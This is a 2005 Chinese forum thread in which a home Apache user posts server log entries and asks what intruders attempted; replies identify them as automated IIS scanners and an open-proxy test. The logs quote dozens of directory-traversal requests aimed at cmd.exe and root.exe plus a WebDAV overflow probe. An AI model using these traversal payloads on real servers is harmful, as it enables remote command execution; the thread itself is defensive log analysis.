免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1410 | 回复: 7
打印 上一主题 下一主题

[Web] 大牛看看, 别人在我的apache上搞了什么 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-06-02 18:05 |只看该作者 |倒序浏览
我家里的机器,winxp+apache2.0.52
给朋友作个主页
今天看日志,发现几个下面这些内容
1,
221.221.17.2 - - [23/May/2005:13:52:27 +0800] "SEARCH /
\x90\x02\xb1......(许多\x02\xb1)
\x90.....(许多\x90)" 414 336

2,

221.221.17.153 - - [27/May/2005:22:55:38 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
221.221.17.153 - - [27/May/2005:22:55:41 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314

3,

221.221.19.211 - - [27/May/2005:23:40:36 +0800] "OPTIONS / HTTP/1.1" 200 2509

论坛徽章:
0
2 [报告]
发表于 2005-06-02 18:09 |只看该作者

大牛看看, 别人在我的apache上搞了什么

再加一个:
211.146.112.211 - - [29/May/2005:00:26:40 +0800] "GET http://proxy-scanner.thu.cn/proxy-scanner.php HTTP/1.1" 404 310

论坛徽章:
0
3 [报告]
发表于 2005-06-02 18:18 |只看该作者

大牛看看, 别人在我的apache上搞了什么

脚本扫描

论坛徽章:
0
4 [报告]
发表于 2005-06-02 22:39 |只看该作者

大牛看看, 别人在我的apache上搞了什么

goodloveboys兄, 是第一还是第二个?
他能不能得到服务器上面的脚本?(咱是用瘟到死, 最怕这个)

论坛徽章:
0
5 [报告]
发表于 2005-06-03 04:44 |只看该作者

大牛看看, 别人在我的apache上搞了什么

针对IIS的扫描器  表害怕

论坛徽章:
0
6 [报告]
发表于 2005-06-03 09:26 |只看该作者

大牛看看, 别人在我的apache上搞了什么

原帖由 "CBD5C0CFCAA6" 发表:
goodloveboys兄, 是第一还是第二个?
他能不能得到服务器上面的脚本?(咱是用瘟到死, 最怕这个)




从你帖的看,没有得到进一步的信息

论坛徽章:
0
7 [报告]
发表于 2005-06-04 21:09 |只看该作者

大牛看看, 别人在我的apache上搞了什么

这段脚本只是针对 IIS 有效的。呵呵。你是apache就不要管了。

PS:这样无聊的家伙太多了。整天去扫描别人的网站。汗。。

论坛徽章:
1
荣誉会员
日期:2011-11-23 16:44:17
8 [报告]
发表于 2005-06-04 21:47 |只看该作者

大牛看看, 别人在我的apache上搞了什么

[quote]原帖由 "CBD5C0CFCAA6"]005:00:26:40 +0800] "GET http://proxy-scanner.thu.cn/proxy-scanner.php HTTP/1.1" 404 310[/quote 发表:

這個訊息你要多注意
主要要測試你的 web server 有沒有支援 proxy ,
及 open proxy 狀況
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP